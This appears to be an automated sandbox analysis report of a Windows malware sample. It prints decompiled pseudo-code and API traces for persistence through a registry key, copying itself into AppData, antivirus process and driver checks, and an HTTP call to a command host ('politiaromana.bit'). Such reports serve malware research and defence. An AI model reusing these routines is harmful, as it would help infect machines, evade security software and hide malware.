				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
				if(_t45 != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
					asm("sbb esi, esi"); // executed
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

0x0f58296b
0x0f58296d
0x0f582979
0x0f582980
0x0f582984
0x0f58298c
0x0f582993
0x0f58299a
0x0f5829a8
0x0f5829b0
0x0f5829bd
0x0f5829c7
0x0f5829ce
0x0f5829eb
0x0f5829f8
0x0f5829ff
0x0f582a06
0x0f582a0d
0x0f582a14
0x0f582a1b
0x0f582a22
0x0f582a29
0x0f582a30
0x0f582a37
0x0f582a3e
0x0f582a45
0x0f582a4c
0x0f582a53
0x0f582a5a
0x0f582a61
0x0f582a68
0x0f582a6f
0x0f582a76
0x0f582a7d
0x0f582a84
0x0f582a8c
0x0f582ac7
0x0f582a8e
0x0f582aa4
0x0f582aaf
0x0f582ab1
0x0f582ab7
0x0f582abf
0x0f582abf

APIs

lstrlenW.KERNEL32(00520050,00000041,772D82B0,00000000), ref: 0F58299D

Part of subcall function 0F5882B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F5882CD
Part of subcall function 0F5882B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F5882FB
Part of subcall function 0F5882B0: GetModuleHandleA.KERNEL32(?), ref: 0F58834F
Part of subcall function 0F5882B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F58835D
Part of subcall function 0F5882B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F58836C
Part of subcall function 0F5882B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883B5
Part of subcall function 0F5882B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5883C3

RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0F582C45,00000000), ref: 0F582A84
lstrlenW.KERNEL32(00000000), ref: 0F582A8F
RegSetValueExW.KERNEL32(0F582C45,00520050,00000000,00000001,00000000,00000000), ref: 0F582AA4
RegCloseKey.KERNEL32(0F582C45), ref: 0F582AB1

Strings

r, xrefs: 0F582A3E
d, xrefs: 0F582A22
n, xrefs: 0F582A76
i, xrefs: 0F5829F8
I, xrefs: 0F582979
\, xrefs: 0F582A14
S, xrefs: 0F5829B0
P, xrefs: 0F58296D
F, xrefs: 0F5829BD
U, xrefs: 0F582984
r, xrefs: 0F582A53
s, xrefs: 0F582A06
W, xrefs: 0F5829C7
H, xrefs: 0F582993
f, xrefs: 0F582A0D
V, xrefs: 0F582A4C
u, xrefs: 0F582A37
R, xrefs: 0F582A68
i, xrefs: 0F582A1B
A, xrefs: 0F58298C
w, xrefs: 0F582A29
n, xrefs: 0F582A61
\, xrefs: 0F582A30
n, xrefs: 0F582A6F
r, xrefs: 0F5829FF
\, xrefs: 0F5829EB
R, xrefs: 0F5829CE
n, xrefs: 0F582A45
i, xrefs: 0F582A5A
e, xrefs: 0F582A7D

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: 3b3f2971afce78b4317862d047c3f8e00acbc6d995383461f027ecabc2b9d2fb
Instruction ID: 078393bbf2970ad8433ee405127a8ced7b1603c5e7f52df8b3d54107fc9dd902
Opcode Fuzzy Hash: 3b3f2971afce78b4317862d047c3f8e00acbc6d995383461f027ecabc2b9d2fb
Instruction Fuzzy Hash: DA31D9B090021DEFEB20CF91E948BEDBFB9FB01709F508119D6187A281D7BA49499F95

Uniqueness

Uniqueness Score: -1.00%

Function 0F582D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0F582D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* _t37;
				short _t42;
				void* _t49;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				_t37 = E0F582F50( &(_v84.message)); // executed
				if(_t37 != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0F582C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0F582D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
								L15:
								ExitThread(0);
							} else {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
								goto L15;
							}
						}
						ExitThread(_t71);
					}
					ExitThread();
				}
				_t59 = E0F582F50( &_v96); // executed
				if(_t59 != 0) {
					goto L5;
				}
				_v84.message = 0x730066;
				_v84.wParam = 0x660064;
				_v84.lParam = 0x2e0077;
				_v84.time = 0x790073;
				_v84.pt = 0x73;
				_t60 = E0F582F50( &(_v84.message)); // executed
				if(_t60 != 0) {
					goto L15;
				}
				_t61 = E0F5830A0(_t62, _t67, _t69); // executed
				if(_t61 != 0) {
					goto L15;
				}
				_push(_t61); // executed
				E0F582AD0(); // executed
				goto L5;
			}

0x0f582d39
0x0f582d3a
0x0f582d3d
0x0f582d45
0x0f582d4a
0x0f582d52
0x0f582d5a
0x0f582d62
0x0f582d67
0x0f582d6f
0x0f582d77
0x0f582d7f
0x0f582d87
0x0f582d8e
0x0f582de9
0x0f582df1
0x0f582df9
0x0f582e01
0x0f582e09
0x0f582e11
0x0f582e22
0x0f582e26
0x0f582e3d
0x0f582e41
0x0f582e49
0x0f582e51
0x0f582e5f
0x0f582e68
0x0f582e6e
0x0f582e73
0x0f582e7b
0x0f582eaf
0x0f582eb4
0x0f582ebc
0x0f582ec8
0x0f582ecf
0x0f582ee3
0x0f582eeb
0x0f582eee
0x0f582eee
0x0f582f09
0x0f582f3d
0x0f582f3f
0x0f582f0b
0x0f582f17
0x0f582f1c
0x0f582f25
0x00000000
0x0f582f17
0x0f582f09
0x0f582ebf
0x0f582ebf
0x0f582e75
0x0f582e75
0x0f582d94
0x0f582d9b
0x00000000
0x00000000
0x0f582da1
0x0f582da9
0x0f582db1
0x0f582db9
0x0f582dc1
0x0f582dc9
0x0f582dd0
0x00000000
0x00000000
0x0f582dd6
0x0f582ddd
0x00000000
0x00000000
0x0f582de3
0x0f582de4
0x00000000

APIs

Part of subcall function 0F582F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F582F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0F582E19
LoadCursorW.USER32 ref: 0F582E2E
LoadIconW.USER32 ref: 0F582E59
RegisterClassExW.USER32 ref: 0F582E68
ExitThread.KERNEL32 ref: 0F582E75

Part of subcall function 0F582F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F582F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F582E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0F582E81
CreateWindowExW.USER32 ref: 0F582EA7
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0F582EB4
ExitThread.KERNEL32 ref: 0F582EBF

Part of subcall function 0F582F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0F582FA8
Part of subcall function 0F582F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0F582FCF
Part of subcall function 0F582F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0F582FE3
Part of subcall function 0F582F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F582FFA

ExitThread.KERNEL32 ref: 0F582F3F

Part of subcall function 0F582AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F582AEA
Part of subcall function 0F582AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F582B2C
Part of subcall function 0F582AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0F582B38
Part of subcall function 0F582AD0: ExitThread.KERNEL32 ref: 0F582C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0F582EC8
UpdateWindow.USER32 ref: 0F582ECF
CreateThread.KERNEL32 ref: 0F582EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F582EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F582F05
TranslateMessage.USER32(?), ref: 0F582F1C
DispatchMessageW.USER32 ref: 0F582F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F582F37

Strings

k, xrefs: 0F582D67
f, xrefs: 0F582DA1
s, xrefs: 0F582D7F
0, xrefs: 0F582DF1
s, xrefs: 0F582DC1
firefox, xrefs: 0F582E9B
s, xrefs: 0F582DB9
d, xrefs: 0F582DA9
1, xrefs: 0F582D6F
win32app, xrefs: 0F582E51, 0F582EA0
s, xrefs: 0F582D77
w, xrefs: 0F582DB1

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: 7ca1dd81af2d706045ad173d30e6494b3e96b2b45e931c7544a64208065e8542
Instruction ID: 142506e2248bef634949804d404099a8f810a23c99f06cee0db32062ad680c9c
Opcode Fuzzy Hash: 7ca1dd81af2d706045ad173d30e6494b3e96b2b45e931c7544a64208065e8542
Instruction Fuzzy Hash: 27515E70648301AFE310AF618D49B5B7FE4BF44B55F10492DF684BA281E7B8A14BCF96

Uniqueness

Uniqueness Score: -1.00%

Function 0F588050 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F588050(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0F587E40(_t64); // executed
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
					_t62 = _t41;
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f0070;
						_v52 = 0x69006c;
						_v48 = 0x690074;
						_v44 = 0x720061;
						_v40 = 0x6d006f;
						_v36 = 0x6e0061;
						_v32 = 0x2e0061;
						_v28 = 0x690062;
						_v24 = 0x74;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63); // executed
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t40;
				}
			}

0x0f588058
0x0f58805b
0x0f588060
0x0f588063
0x0f588063
0x0f58806b
0x0f588082
0x0f588088
0x0f58808a
0x0f588091
0x0f588096
0x0f5880af
0x0f5880b8
0x0f5880c0
0x0f5880c3
0x0f5880e7
0x0f5880eb
0x0f5880f8
0x0f588101
0x0f588108
0x0f58810f
0x0f588116
0x0f58811d
0x0f588124
0x0f58812b
0x0f588132
0x0f588139
0x0f588140
0x0f588147
0x0f588156
0x0f58816d
0x0f5881bc
0x0f58816f
0x0f588175
0x0f588178
0x0f58817d
0x0f58818c
0x0f588190
0x0f588190
0x0f588195
0x00000000
0x00000000
0x0f588197
0x0f5881a2
0x0f5881a9
0x0f5881b8
0x00000000
0x00000000
0x0f5881ba
0x00000000
0x0f5881b8
0x0f588190
0x0f58818c
0x0f58816d
0x0f588156
0x0f5881c2
0x0f5881c9
0x0f5881ce
0x0f5881da
0x0f5881e9
0x0f58809e
0x0f58809e
0x0f58809e

APIs

InternetCloseHandle.WININET(?), ref: 0F588063
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F588082
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0F587046,ipv4bot.whatismyipaddress.com,0F58FF90), ref: 0F5880AF
wsprintfW.USER32 ref: 0F5880C3
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0F5880E1
HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0F58814E
HttpSendRequestW.WININET(00000000,00690074,0069006C,00000000,00000074), ref: 0F588165
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F588184
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F5881B0
GetLastError.KERNEL32 ref: 0F5881BC
InternetCloseHandle.WININET(00000000), ref: 0F5881C9
InternetCloseHandle.WININET(00000000), ref: 0F5881CE
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F587046), ref: 0F5881DA

Strings

l, xrefs: 0F588116
b, xrefs: 0F588140
:, xrefs: 0F588108
t, xrefs: 0F588147
o, xrefs: 0F58812B
t, xrefs: 0F58811D
p, xrefs: 0F58810F
HTTP/1.1, xrefs: 0F5880D7
a, xrefs: 0F588124
s, xrefs: 0F588101
a, xrefs: 0F588139
H, xrefs: 0F5880F8
a, xrefs: 0F588132

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: :$H$HTTP/1.1$a$a$a$b$l$o$p$s$t$t
API String ID: 3906118045-2187218134
Opcode ID: 8684f8d27a1ee71770d5e59dfc2ae87e9384fe62cf759b6ff1a5f74f0eca0e74
Instruction ID: fb9741fe322c9d45a71f587c5887f673f2e20cb36e725705d743cf1e3b9af782
Opcode Fuzzy Hash: 8684f8d27a1ee71770d5e59dfc2ae87e9384fe62cf759b6ff1a5f74f0eca0e74
Instruction Fuzzy Hash: 6341B430600208BBEB109F51DC48FEE7FB9FF04B55F504119F904B6281C7B99956DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0F587B70 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0F587B70(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t47;
				void* _t49;
				int _t50;
				WCHAR* _t56;
				int _t63;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t75 = _t47;
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c; // executed
					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						_t50 = Process32FirstW(_t49); // executed
						if(_t50 != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									_t63 = Process32NextW(_v20, _t75); // executed
									if(_t63 != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000); // executed
						FindCloseChangeNotification(_v20); // executed
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000); // executed
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

0x0f587b8d
0x0f587b8f
0x0f587b9d
0x0f587b9f
0x0f587ba6
0x0f587bad
0x0f587bb4
0x0f587bbb
0x0f587bc2
0x0f587bc9
0x0f587bd0
0x0f587bd7
0x0f587bde
0x0f587be5
0x0f587bec
0x0f587bf3
0x0f587bfa
0x0f587c01
0x0f587c03
0x0f587c05
0x0f587c0a
0x0f587c34
0x0f587c3a
0x0f587c0c
0x0f587c10
0x0f587c16
0x0f587c1c
0x0f587c22
0x0f587c3f
0x0f587c41
0x0f587c43
0x0f587c46
0x0f587c49
0x0f587c4c
0x0f587c4f
0x0f587c57
0x00000000
0x0f587c60
0x0f587c68
0x0f587c70
0x0f587c7f
0x0f587c83
0x00000000
0x0f587c85
0x0f587c85
0x0f587c85
0x0f587ce7
0x0f587ce7
0x0f587cee
0x0f587cf6
0x00000000
0x00000000
0x00000000
0x0f587cf6
0x0f587c8e
0x0f587c8f
0x0f587c91
0x0f587c98
0x0f587cb5
0x0f587cbe
0x0f587c9a
0x0f587c9a
0x0f587ca7
0x0f587ca7
0x0f587cc0
0x0f587cde
0x0f587ce1
0x0f587ce4
0x00000000
0x0f587ce4
0x0f587d07
0x0f587d0b
0x0f587d0d
0x0f587d13
0x0f587d20
0x0f587d20
0x0f587d13
0x0f587d2b
0x0f587d2b
0x0f587d3b
0x0f587d40
0x0f587d46
0x0f587d4b
0x0f587d55
0x0f587d55
0x0f587d5f
0x0f587c24
0x0f587c2c
0x00000000
0x0f587c2c
0x0f587c22

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F587B8D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F587C01
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F587C16
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F587C2C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0F587C4F
lstrcmpiW.KERNEL32(0F5903AC,-00000024), ref: 0F587C75
Process32NextW.KERNEL32(?,?), ref: 0F587CEE
GetLastError.KERNEL32 ref: 0F587CF8
lstrlenW.KERNEL32(00000000), ref: 0F587D16
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F587D3B
FindCloseChangeNotification.KERNEL32(?), ref: 0F587D40
VirtualFree.KERNELBASE(?,?,00008000), ref: 0F587D55

Strings

i)w, xrefs: 0F587C75

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
String ID: i)w
API String ID: 1411803383-1280834553
Opcode ID: d8c7260aa22c64026fed599107f84de27d6d1a74c7676b23f1435bed7ccf9877
Instruction ID: bf7ffb222bc93faeca42814bda6c4ed375b14932ef22ecdb0bff7d343602f07c
Opcode Fuzzy Hash: d8c7260aa22c64026fed599107f84de27d6d1a74c7676b23f1435bed7ccf9877
Instruction Fuzzy Hash: 5851AE71900218EBCF149FA4E948BAE7FB4FF48725F20406AE505BB381C7746906DF94

Uniqueness

Uniqueness Score: -1.00%

Function 0F582AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0F582AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0F5881F0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0F5882B0( &_v20, lstrlenW( &_v20)); // executed
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0F5881F0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0F582890(_v28, _t50);
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0F582960(_t57, _t75); // executed
					L17:
					ExitThread(0);
				}
			}

0x0f582ad6
0x0f582aea
0x0f582af0
0x0f582af4
0x0f582af6
0x0f582b00
0x0f582b1c
0x0f582b1e
0x0f582b1e
0x0f582b02
0x0f582b02
0x0f582b02
0x0f582b08
0x0f582b10
0x0f582b12
0x0f582b14
0x0f582b14
